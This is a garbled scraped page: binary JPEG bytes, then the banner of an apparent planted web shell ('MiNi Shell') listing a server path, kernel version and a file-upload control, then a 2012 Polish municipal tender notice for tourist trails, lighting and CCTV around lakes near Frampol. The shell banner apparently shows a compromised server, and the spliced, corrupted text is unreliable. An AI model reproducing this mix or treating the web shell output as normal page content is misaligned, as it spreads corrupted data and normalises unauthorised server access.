JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120113/12672-N-2012.html

<p class="kh_header"><b>Frampol: Wykonanie dokumentacji  projektowej  oraz wykonanie robót budowlanych i robót teletechnicznych  wchodzących w zakres realizacji Projektu PIĘĆ ZALEWÓW-MORZE ATRAKCJI .</b><br>
<b>Numer ogłoszenia: 12672 - 2012; data zamieszczenia: 13.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Frampola , ul. Radzięcka 8, 23-440 Frampol, woj. lubelskie, tel. 084 6857509 w. 38.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.frampol.bip.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji  projektowej  oraz wykonanie robót budowlanych i robót teletechnicznych  wchodzących w zakres realizacji Projektu PIĘĆ ZALEWÓW-MORZE ATRAKCJI ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dane dotyczące całego przedmiotu zamówienia:

1) Przedmiotem zamówienia  jest wykonanie w formie zaprojektuj i wybuduj robót budowlanych i robót teletechnicznych wchodzących w zakres realizacji Projektu PIĘĆ ZALEWÓW-MORZE ATRAKCJI
2) Zamówienie obejmuje  projektowanie oraz wykonanie robót budowlanych i robót
     teletechnicznych w oparciu o program funcjonalno-użytkowy dla:
1) branża budowlana,
2) branża  teletechniczna. Przedstawione w programach funkcjonalno-użytkowych  opracowania są tylko materiałem wyjściowym i pomocniczym dla Wykonawcy do sporządzenia własnych opracowań wykonania zadań składających się na przedmiot zamówienia. Przedstawione w programach funkcjonalno - użytkowych  wielkości i miary są parametrami szacunkowymi-ostateczne wielkości zostaną  ustalone na podstawie sporządzonej przez Wykonawcę dokumentacji projektowej (projekt budowlany i projekty wykonawcze); w przypadku rozbieżności Wykonawca nie ma prawa do dodatkowego wynagrodzenia.
3)Programy funkcjonalno-użytkowe, SIWZ, Oferta Wykonawcy, Umowa  oraz wszystkie załączniki stanowią jedna całość.
4) Projekt zagospodarowania turystycznego obejmuje wyznaczenie i oznakowanie szlaków turystycznych, stworzenie parku linowego , budowę  schodów przy kapliczce , budowę ciągu pieszego wokół  zalewu Rudka wraz z oświetleniem oraz wzbogacenie go o małą architekturę , taką jak  przystanki  rowerowe w postaci altan i wiat, ambony widokowe, pomosty do wodowania kajaków, ławki, kosze na śmieci, tablice  informacyjne . Projekt zakłada także przygotowanie terenu pod parking dla turystów.
5) Cały obszar Projektu  zlokalizowany jest na terenie 8 gmin z tym, że przedmiot zamówienia do wykonania na obszarze 7 gmin i tak:
1.Gmina Frampol,
2.Gmina Radecznica,  
3.Gmina Sułów,  
4.Gmina Szczebrzeszyn,  
5. Gmina Dzwola,  
6. Gmina Janów Lubelski, 
7.Gmina Zwierzyniec;
oferuje turystom możliwość  kąpieli,  wypożyczenia sprzętu wodnego,połowu ryb, itp.
6) Celem Projektu jest uzupełnienie szlaków istniejących, połączenie ich w jedną sieć tras  turystycznych, łączących pięć zalewów  znajdujących się  na terenie gmin objętych Projektem.
7) Wszystkie projektowane  obiekty, w możliwym do wykonania zakresie, zostaną dostosowane do potrzeb  osób niepełnosprawnych,  poprzez zbudowanie odpowiednich konstrukcji ramp, dobre utwardzenie nawierzchni i na  odpowiedniej wysokości.
8) Projektowana trasa rowerowa jest uzupełnieniem tras istniejących.
9) Poza szlakiem rowerowym przewidziane zostały: 
1) dwie linie szlaku konnego ,
2) szlak narciarski.
10) Wykonawca opracuje dokumentację projektową  zawierającą co najmniej:
     a)-projekt budowlany - opracowany w zakresie zgodnym z wymogami  przepisów ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz.U. z 2010 r. Nr 243,poz.1623ze zm .)oraz przepisów rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i formy projektowania budowlanego (Dz.U. Nr 121,poz.1173 ze zm.)
     b) inne opracowania wymagane do uzyskania pozwolenia na budowę,
     c) dokumentację wykonawczą  dla celów realizacji inwestycji - projekty wykonawcze, które stanowić będą  uszczegółowienie dla potrzeb wykonawstwa projektu budowlanego-
          -  dokumentacja powinna być opracowana z uwzględnieniem warunków zatwierdzenia Projektu Budowlanego oraz warunków zawartych w uzyskanych uzgodnieniach,
          -  projekty wykonawcze winny zostać opracowane z podziałem na obiekty oraz branże,
      d) przedmiary robót umożliwiające etapowe rozliczanie inwestycji,
      e) specyfikacje techniczne wykonania i odbioru robót ,
      f) dokumentację powykonawczą  do uzyskania pozwolenia na użytkowanie z naniesionymi w sposób czytelny wszelkimi zmianami wprowadzonymi w trakcie budowy wraz z inwentaryzacją geodezyjną  wykonanych  obiektów,
      g) instrukcje eksploatacji ,obsługi,ppoż. i instrukcje stanowiskowe urządzeń .
11) Przed rozpoczęciem prac projektowych  Wykonawca zweryfikuje dane wyjściowe
      do projektowania przygotowane przez Zamawiającego, wykona na własny koszt wszystkie badania i analizy uzupełniające niezbędne dla prawidłowego wykonania wszelkiej dokumentacji projektowej.
12)	W przypadkach uzasadnionych przepisami prawa lub względami praktycznymi , aby niektóre dokumenty składające się na dokumentację projektową  były poddane weryfikacji przez osoby uprawnione lub uzgodnione przez odpowiednie władze, to  przeprowadzenie weryfikacji ilub uzyskanie uzgodnień będzie przeprowadzone przez Wykonawcę  na jego koszt,po wcześniejszym wewnętrznym skoordynowaniu dokumentacji przez projektantów branżowych(z ich zapisem potwierdzającym powyższe czynności) i przed przedłożeniem tej dokumentacji do zatwierdzenia przez Zamawiającego.
13) Wykonawca uzyska  wszelkie niezbędne , wymagane zgodnie z prawem polskim uzgodnienia, opinie, dokumentacje i decyzje administracyjne niezbędne do zaprojektowania, wybudowania, uruchomienia i przekazania do użytkowania.
14) Konieczne do uzyskania  pozwolenia: 
1)pozwolenie na budowę parkingu, 
2) pozwolenie na budowę  ciągu pieszo-rowerowego, 
3) pozwolenie na wykonanie zagospodarowania terenów zielonych,
4) pozwolenie na budowę oświetlenia, 
5) uzgodnienia i pozwolenia z przyłączami wodno- kanalizacyjnymi, energetycznymi i gazowymi.  
15) Wykonawca jest zobowiązany do uzyskania aktualnych map do celów projektowych na obszary gmin objętych Projektem - w przypadku nieposiadania map przez Zamawiającego, odpowiednie mapy Wykonawca musi wykonać na własny koszt.
16) Zamawiający  oczekuje od zastosowanych rozwiązań  funkcjonalności, nowoczesności i bezpieczeństwa eksploatacji. Na całość  wykonanych prac oraz
      poszczególne obiekty Zamawiający wymaga udzielenia gwarancji. W przypadku
     gotowych elementów , np. urządzeń na plac zabaw, oprzyrządowania sportowego,
     wymagane są odpowiednie certyfikaty, atesty higieniczne, deklaracje zgodności z
     obowiązującymi Polskimi Normami.
17)Do zaprojektowania i wybudowania:
      - trasa rowerowa;
      - dwie linie szlaku konnego;
      - szlak narciarki
        z uwzględnieniem zaprojektowania i wybudowania:
      a) parking we Frampolu;
      b) ciąg pieszo- rowerowy wokół Zalewu Rudka, a także doudrożnienie;
      d) poprawa przejezdności i uporządkowanie tras turystycznych w gminie Frampol i
          Radecznica;
      e) roboty teletechniczne :
           - system monitoringu wizyjnego (CCTV),
           - system zabezpieczeń na wypadek zagrożeń ,
           - system monitoringu przepływu ludności oraz ewaluacja danych odnoszących się do punktów turystycznych ,
           - szerokopasmowego dostępu do internetu  (dostęp radiowy) ,
           - audio i video przewodników z wykorzystaniem innowacyjnych narzędzi ICT
              (Dostawa Infokiosków i przygotowanie treści multimedialnych),
           - serwisów internetowych
           - uruchomienie i wdrożenie wymienionych systemów.,
           -  wykonanie prac towarzyszących,
      f) oświetlenie Zalewu Rudka w gminie Zwierzyniec;
      g) oświetlenie  terenu w Zakłodziu- gmina Radecznica-do zaprojektowania i
          wybudowania 5 szt. oświetlenia (słup+oprawa);
      h) renowacja studni w Teodorówce-gmina Frampol;
      i) altana- obiekt małej architektury przeznaczony dla większej liczby osób w gminach Sułów, Szczebrzeszyn, Janów Lubelski;
      j) zadaszenie- deszczochrony w gminie Janów Lubelski;
      k) wiata- zadaszenie z możliwością  ustawienia wewnątrz ław i stołów w
          gminach:Frampol, Radecznica, Sułów;
      l) ambona widokowa - jako punkt obserwacyjny krajobrazu w gminach:  Janów
         Lubelski, Zwierzyniec i Frampol;
     m) siłownia zewnętrzna - urządzenia do fitness na powietrzu , przymocowane do gruntu w gminie Frampol;
      n) kładka drewniana- stanowiąca połączenie między pomostem a kapliczką
           Św.Antoniego w gminie Radecznicza,
      o) pomost do cumowania kajaków w gminie Sułów na trasie spływów kajakowych;
      p) koniowiązy na trasie ścieżki konnej oraz paśniki- w gminie Janów Lubelski;
      r) park linowy- urządzenia rozmieszczone między istniejącymi drzewami w gminie
          Sułów;
18) Do zamontowania tablice informujące o całym szlaku i przy poszczególnych atrakcjach.
      Lokalizacja w gminach : Frampol, Radecznica, Sułów, Szczebrzeszyn, Janów Lubelski i Zwierzyniec.
19) Dla każdej z gmin Wykonawca zaprojektuje i wykona  komplet oznakowania
       turystycznego w jednolitej grafice i materiale- tożsamej dla każdej gminy;
20) Dla potrzeb zapłaty wynagrodzenia za przedmiot zamówienia , realizację przedmiotu zamówienia  dzieli się na Etapy odpowiadające  zakresowi robót w terenie pokrywającemu się z obszarami Gmin Partnerskich :
1.Gmina Dzwola,
2.Gmina Frampol 
3.Gmina Janów Lubelski
4   Gmina Radecznica 
5. Gmina Sułów, 
6. Gmina Szczebrzeszyn, 
7.Gmina Zwierzyniec-ustalenie  kolejności należy do Wykonawcy w Harmonogramie rzeczowo-finasowym  przedmiotu zamówienia.
21)	Stadia dokumentacji projektowej: 
1) projekt budowlany,
2) projekty wykonawcze dla poszczególnych branż i gmin partnerskich ,
3) specyfikacje techniczne wykonania i odbioru robót , 
4) przedmiary robót, 
5) kosztorysy inwestorskie, 
6) inne opracowania i uzgodnienia niezbędne do uzyskania odpowiednich pozwoleń, 
7) dokumentacja  powykonawcza.
22) Dokumentacja projektowa będzie przekazywana Zamawiającemu do zatwierdzenia w trzech etapach:
            a) Etap I - Projekt budowlany;
            b) Etap II - Projekty Wykonawcze w branżach , w celu wydania przez Zamawiającego decyzji o rozpoczęciu robót;
            c) Etap III- dokumentacja powykonawcza.
23) Dokumentacja  projektowa musi uzyskać  zatwierdzenie w zakresie przyjętych i zastosowanych rozwiązań technicznych przez Zamawiającego.
24) Roboty wykonywane w ramach realizacji przedmiotu zamówienia  będą prowadzone
      jednocześnie w wielu miejscach , podanych w ppkt 20  i będą wykonywane na terenach i obiektach czynnych; nie mogą zakłócać działania obiektów i dostępności terenów oraz wprowadzać zagrożenia  dla ludzi i mienia.
25) Terminy i zakres robót należy  uzgadniać  z właścicielami-administratorami obiektów-terenów.
26) Prace w obrębie pasa drogowego wymagają uzyskania zgody na zajęcie wraz z organizacją ruchu.
27) Budowany system monitoringu wizyjnego oraz infrastruktura informatyczna mają  za zadanie podnieść poziom bezpieczeństwa, funkcjonalność  oraz atrakcyjność  miejsc ,w których ta infrastruktura powstanie.
28) Należy zapewnić możliwie bezobsługową pracę  wszystkich elementów , a zwłaszcza ciągłość nagrań obrazu z kamer oraz łączność. W celu zwiększenia bezpieczeństwa zainstalowanych urządzeń , szafki teletechniczne SZ, należy wyposażyć w czujniki sygnalizujące otwarcie drzwi oraz w przekaźnik zaniku zasilania podstawowego.
29) Dokumentacja projektowa powinna być opracowana zgodnie z odpowiednimi przepisami prawa budowlanego, Polskimi normami , zasadami wiedzy technicznej, wymaganiami technicznymi Zamawiającego i potrzebami sprawnego przeprowadzenia procesu inwestycyjnego.
30. Dane wyjściowe stanowiące podstawę opracowania dokumentacji projektowej powinny być kompletne, rzetelne i mieć oparcie w odpowiednich dokumentach zamieszczonych w  Programach funkcjonalno-użytkowych i przekazanych przez Zamawiającego oraz pozyskanych  przez Wykonawcę.
31.Zakres i treść  dokumentacji projektowej powinna być dostosowana do specyfiki i
     charakteru obiektu oraz stopnia skomplikowania robót budowlanych i robót  teletechnicznych.
32. Projekt  powinien zawierać  szczegóły pozwalające na potwierdzenie zgodności zastosowanych rozwiązań  technicznych z Programami funkcjonalno-użytkowymi , a w szczególności  ilości materiałów  i urządzeń , typy i modele materiałów i urządzeń , karty katalogowe, opisy, certyfikaty i aprobaty techniczne zastosowanych urządzeń  i materiałów, plany rozmieszczenia elementów oraz schematy ideowe systemów. Dla rozwiązań software-owych opisy funkcjonalności i widoki ekranów.
34. Całościowy  zakres do zaprojektowania i wybudowania określają programy funkcjonalno- użytkowe.
35.	Wykonawca dokona przeszkolenia osób wskazanych  przez Gminy Partnerskie - co najmniej 1 osoby z każdej  gminy- w zakresie obsługi wybudowanych urządzeń i systemów składających się na roboty teletechniczne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.70.00-6, 71.32.80.00-3, 71.32.31.00-9, 71.00.00.00-8, 71.32.00.00-2, 45.31.12.00-2, 45.23.31.62-2, 45.11.12.00-0, 45.11.13.00-1, 34.97.10.00-4, 31.52.72.10-1, 03.41.91.00-0, 45.11.12.91-4, 45.31.23.30-9, 45.31.10.00-0, 31.68.13.00-6, 32.42.10.00-0, 35.12.17.00-5, 32.23.40.00-2, 72.71.00.00-0, 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający  żąda wniesienia przez Wykonawców  wadium. Wartość wadium została
      ustalona na kwotę 50 000,00ZŁ( pięćdziesiąt tysięcy)
2.Wadium Wykonawcy winni wnieść przed upływem terminu składania ofert.
3.Wadium może być  wnoszone w jednej lub kilku formach:
      1) pieniądzu;
      2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
          kredytowej , z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
      3) gwarancjach bankowych;
      4) gwarancjach ubezpieczeniowych;
      5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust.5 pkt 2
          ustawy z dnia 9 lipca 2000 r. o utworzeniu Polskiej Agencji Rozwoju
          Przedsiębiorczości (Dz.U.Nr 109,poz. 1158 ze zm.)
4. Wadium wnoszone w pieniądzu należy wpłacić na rachunek  bankowy: w Banku  Spółdzielczym we Frampolu Nr 15 9604 00005 0000 0286 2000 0060. Tytuł wpłaty: Wadium w przetargu  nieograniczonym na realizację Projektu PIĘĆ ZALEWÓW-MORZE ATRAKCJI
5. Za datę i godzinę wniesienia wadium w pieniądzu przyjmuje się datę i godzinę wpływu wadium na wskazany w pkt. 4 rachunek bankowy. Uznanie konta Zamawiającego winno nastąpić najpóźniej  do dnia 27 stycznia 2012r. do godz. 12.00.
6. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
7.  Wadium wnoszone w formach , o których mowa w pkt 3 ppkt 2,3,4 i 5 musi wskazywać przedmiot zamówienia i zabezpieczać złożoną ofertę przez cały okres , na jaki Wykonawca jest związany ofertą. Dokument taki musi zawierać nieodwołalne i bezwarunkowe  zobowiązanie poręczyciela lub gwaranta  wypłacenia Zamawiającemu, na pierwsze jego żądanie , kwoty wadium , w przypadkach , o których mowa w  pkt 13 i w pkt 14. Dokument ten w oryginale może być dołączony do oferty lub może
być złożony w oddzielnej kopercie , zawierającej dane Wykonawcy i napis  Wadium w  na realizację Projektu PIĘĆ ZALEWÓW-MORZE  ATRAKCJI w  siedzibie              Zamawiającego - Sekretariat, przed upływem terminu składania ofert tj. najpóźniej do
 dnia 27 stycznia 2012r. do godz. 12.00.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone w art. 22 ust. 1 pkt 1,2,3,4 ustawy   warunki dotyczące:
     1 ) posiadania uprawnień  do wykonywania określonej działalności lub czynności,    
                      jeżeli przepisy  prawa nakładają obowiązek ich posiadania.
Zamawiający dokona oceny spełniania warunków wymienionych w pkt.1 na podstawie żądanych w pkt.VI SIWZ dokumentów i oświadczeń, wg. formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie spełniony ,jeżeli  Wykonawca wykaże ,że:
 -w okresie  ostatnich pięciu lat przed  upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej:
a)- 2 roboty budowlane  , o wartości  co najmniej 1 000 000,00zł.                        brutto, każda robota budowlana;
 b)- 2 roboty  budowlane  systemów teletechnicznych , o wartości co najmniej 300 000,00 zł. brutto każda robota;
Zamawiający dokona oceny spełniania warunków wymienionych w pkt.1 na podstawie żądanych w pkt.VI SIWZ dokumentów i oświadczeń, wg. formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-warunek ten zostanie spełniony ,jeżeli Wykonawca do wykonania zamówienia
            zapewni:
                      f)  wykaże możliwość korzystania z maszyn i sprzętu( dla zakresu robót    
                           teletechnicznych, w tym  wykonania robót instalacyjnych)
                           - wiertarki elektryczne,
                           - odkurzacz przemysłowy,
                           - megaomomierz,
                           - mostek kablowy,
                           - żuraw samochodowy ( lub rusztowania),
                           - zaciskarka do taśm stalowych,
                           - pentaskaner,
                           - komputer przenośny (laptop) z oprogramowaniem konfiguracyjnym
                             instalowanych systemów,
                           - miernik z monitorem wizyjnym do regulacji kamer,
                           - zagęszczarka gruntu,
                           - samochód dostawczy do 3,5t U
Zamawiający dokona oceny spełniania warunków wymienionych w pkt.1 na podstawie żądanych w pkt.VI SIWZ dokumentów i oświadczeń, wg. formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-warunek ten zostanie spełniony ,jeżeli Wykonawca do wykonania zamówienia
            zapewni:
            a) co najmniej 1 osobę  posiadająca uprawnienia wymagane przepisami ustawy  
                            Prawo budowlane do pełnienia samodzielnych funkcji w budownictwie -                                 
                            kierowania robotami ogólnobudowlanymi z min. 3 letnią praktyką zawodową;
           b) co najmniej 1 osobę  posiadająca uprawnienia wymagane przepisami ustawy  
                            Prawo budowlane do pełnienia samodzielnych funkcji w budownictwie -                                 
                            kierowania robotami budowlanymi  instalacji elektrycznych z min. 3 letnią
                            praktyką zawodową;
                       c) co najmniej 1 osobę  posiadająca uprawnienia wymagane przepisami ustawy  
                            Prawo budowlane do pełnienia samodzielnych funkcji w budownictwie -                                 
                            kierowania robotami budowlanymi  instalacji telekomunikacyjnych z min. 3 letnią  
                            praktyką ;
                        -  dla ppkt litera b i litera c - dopuszcza się posiadanie uprawnień wykonawczych w
                            zakresie elektrycznym i  telekomunikacyjnym przez jedną osobę z min. 3 letnią
                            praktyka  zawodową;  
                      d)  co najmniej 1 osobę  posiadającą uprawnienia znakarza szlaków PTTK   
                            równoważny) oraz doświadczenie przy projektowaniu i wykonywaniu szlaków  
                            rowerowych na długości min. 100km, w tym co najmniej 30 km szlaków
                            zaprojektowanych i min. 30 km szlaków wykonanych licencję do wyznaczenia
                            szlaków turystycznych;
                      e)  co najmniej 1 osobę posiadającą wymagane przepisami ustawy Prawo budowlane
                            uprawnienia do projektowania  w specjalności ogólnobudowlanej z min. 3 letnim
                            doświadczeniem;
                       f)  co najmniej 1 osobę posiadającą wymagane przepisami ustawy Prawo budowlane  
                            uprawnienia do  projektowania  w specjalności elektrycznej
                            w zakresie sieci , instalacji i urządzeń  elektrycznych i elektroenergetycznych
                            wynikających z przedmiotu zamówienia  z  min. 3 letnim doświadczeniem;
                       g)   co najmniej 1 osobę posiadającą wymagane przepisami ustawy Prawo budowlane  
                            uprawnienia do  projektowania  w specjalności teletechnicznej
                            w zakresie sieci , instalacji i urządzeń  elektrycznych i elektroenergetycznych
                            wynikających z przedmiotu zamówienia  z  min. 3 letnim doświadczeniem;
                    -    dla ppkt litera f i g dopuszcza się posiadanie uprawnień wykonawczych w zakresie    
                          elektrycznym i telekomunikacyjnym przez 1 osobę z min. 3 letnim   
                          doświadczeniem.
Zamawiający dokona oceny spełniania warunków wymienionych w pkt.1 na podstawie żądanych w pkt.VI SIWZ dokumentów i oświadczeń, wg. formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie spełniony ,jeżeli Wykonawca:
         a)  posiada środki finansowe lub
              zdolność kredytową
             - w wysokości co najmniej 1.000 000,00zł.(jeden milion);
        b) jest ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej
             działalności i suma gwarancyjna wynosi co najmniej  5 000 000,00zł. (pięć
                         miliony);
Zamawiający dokona oceny spełniania warunków wymienionych w pkt.1 na podstawie żądanych w pkt.VI SIWZ dokumentów i oświadczeń, wg. formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

